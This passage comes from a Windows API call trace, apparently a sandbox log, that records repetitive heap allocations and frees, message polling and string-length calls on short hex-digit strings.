hHeap=0x25c0000) returned 1 [0133.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbc0 [0133.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ea8 [0133.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ec0 [0133.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbd0 [0133.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ed8 [0133.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbd0 | out: hHeap=0x25c0000) returned 1 [0133.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ed8 | out: hHeap=0x25c0000) returned 1 [0133.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ec0 | out: hHeap=0x25c0000) returned 1 [0133.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbc0 [0133.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d720 [0133.138] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbc0 [0133.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ea8 [0133.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ec0 [0133.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbd0 [0133.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ed8 [0133.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbe0 [0133.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f08 [0133.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f20 [0133.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbf0 [0133.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f38 [0133.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f50 [0133.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbf0 [0133.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f68 [0133.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbf0 [0133.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f80 [0133.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbf0 [0133.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f98 [0133.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f38 | out: hHeap=0x25c0000) returned 1 [0133.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f20 | out: hHeap=0x25c0000) returned 1 [0133.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f50 | out: hHeap=0x25c0000) returned 1 [0133.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f68 | out: hHeap=0x25c0000) returned 1 [0133.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f08 | out: hHeap=0x25c0000) returned 1 [0133.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.139] lstrlenW (lpString="40") returned 2 [0133.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f80 | out: hHeap=0x25c0000) returned 1 [0133.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f98 | out: hHeap=0x25c0000) returned 1 [0133.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ed8 | out: hHeap=0x25c0000) returned 1 [0133.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbd0 | out: hHeap=0x25c0000) returned 1 [0133.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ed8 [0133.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbd0 [0133.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ec0 | out: hHeap=0x25c0000) returned 1 [0133.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbd0 | out: hHeap=0x25c0000) returned 1 [0133.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ed8 | out: hHeap=0x25c0000) returned 1 [0133.140] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.140] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbd0 [0133.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ed8 [0133.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbc0 [0133.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ea8 [0133.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ec0 [0133.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbf0 [0133.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f98 [0133.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f80 [0133.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbe0 [0133.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f08 [0133.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f68 [0133.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbe0 [0133.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f50 [0133.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbe0 [0133.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f20 [0133.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbe0 [0133.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f38 [0133.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f08 | out: hHeap=0x25c0000) returned 1 [0133.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f80 | out: hHeap=0x25c0000) returned 1 [0133.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f68 | out: hHeap=0x25c0000) returned 1 [0133.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f50 | out: hHeap=0x25c0000) returned 1 [0133.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f98 | out: hHeap=0x25c0000) returned 1 [0133.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.141] lstrlenW (lpString="54") returned 2 [0133.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f20 | out: hHeap=0x25c0000) returned 1 [0133.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f38 | out: hHeap=0x25c0000) returned 1 [0133.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ec0 | out: hHeap=0x25c0000) returned 1 [0133.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ea8 [0133.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ec0 [0133.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbc0 [0133.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ed8 | out: hHeap=0x25c0000) returned 1 [0133.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbd0 | out: hHeap=0x25c0000) returned 1 [0133.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ec0 | out: hHeap=0x25c0000) returned 1 [0133.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.142] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.142] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbc0 [0133.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ea8 [0133.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ec0 [0133.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbd0 [0133.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ed8 [0133.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbe0 [0133.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f38 [0133.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f20 [0133.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbf0 [0133.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f98 [0133.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f50 [0133.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbf0 [0133.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f68 [0133.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbf0 [0133.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f80 [0133.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbf0 [0133.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f08 [0133.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f98 | out: hHeap=0x25c0000) returned 1 [0133.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f20 | out: hHeap=0x25c0000) returned 1 [0133.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f50 | out: hHeap=0x25c0000) returned 1 [0133.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f68 | out: hHeap=0x25c0000) returned 1 [0133.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f38 | out: hHeap=0x25c0000) returned 1 [0133.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.143] lstrlenW (lpString="65") returned 2 [0133.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f80 | out: hHeap=0x25c0000) returned 1 [0133.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f08 | out: hHeap=0x25c0000) returned 1 [0133.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ed8 | out: hHeap=0x25c0000) returned 1 [0133.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbd0 | out: hHeap=0x25c0000) returned 1 [0133.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ed8 [0133.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbd0 [0133.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ec0 | out: hHeap=0x25c0000) returned 1 [0133.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbd0 | out: hHeap=0x25c0000) returned 1 [0133.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ed8 | out: hHeap=0x25c0000) returned 1 [0133.143] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.144] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbd0 [0133.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ed8 [0133.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbc0 [0133.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ea8 [0133.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ec0 [0133.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbf0 [0133.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f08 [0133.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f80 [0133.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbe0 [0133.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f38 [0133.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f68 [0133.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbe0 [0133.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f50 [0133.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbe0 [0133.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f20 [0133.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbe0 [0133.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f98 [0133.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f38 | out: hHeap=0x25c0000) returned 1 [0133.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f80 | out: hHeap=0x25c0000) returned 1 [0133.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f68 | out: hHeap=0x25c0000) returned 1 [0133.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f50 | out: hHeap=0x25c0000) returned 1 [0133.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f08 | out: hHeap=0x25c0000) returned 1 [0133.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.145] lstrlenW (lpString="6D") returned 2 [0133.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f20 | out: hHeap=0x25c0000) returned 1 [0133.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f98 | out: hHeap=0x25c0000) returned 1 [0133.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ec0 | out: hHeap=0x25c0000) returned 1 [0133.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ea8 [0133.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ec0 [0133.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbc0 [0133.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ed8 | out: hHeap=0x25c0000) returned 1 [0133.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbd0 | out: hHeap=0x25c0000) returned 1 [0133.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ec0 | out: hHeap=0x25c0000) returned 1 [0133.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.147] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.147] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbc0 [0133.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ea8 [0133.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ec0 [0133.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbd0 [0133.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ed8 [0133.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbe0 [0133.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f98 [0133.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f20 [0133.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbf0 [0133.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f08 [0133.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f50 [0133.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbf0 [0133.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f68 [0133.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbf0 [0133.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f80 [0133.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbf0 [0133.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f38 [0133.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f08 | out: hHeap=0x25c0000) returned 1 [0133.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f20 | out: hHeap=0x25c0000) returned 1 [0133.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f50 | out: hHeap=0x25c0000) returned 1 [0133.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f68 | out: hHeap=0x25c0000) returned 1 [0133.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f98 | out: hHeap=0x25c0000) returned 1 [0133.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbe0 | out: hHeap=0x25c0000) returned 1 [0133.149] lstrlenW (lpString="70") returned 2 [0133.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f80 | out: hHeap=0x25c0000) returned 1 [0133.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbf0 | out: hHeap=0x25c0000) returned 1 [0133.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f38 | out: hHeap=0x25c0000) returned 1 [0133.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ed8 | out: hHeap=0x25c0000) returned 1 [0133.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbd0 | out: hHeap=0x25c0000) returned 1 [0133.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ed8 [0133.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbd0 [0133.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ec0 | out: hHeap=0x25c0000) returned 1 [0133.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbc0 | out: hHeap=0x25c0000) returned 1 [0133.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbd0 | out: hHeap=0x25c0000) returned 1 [0133.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 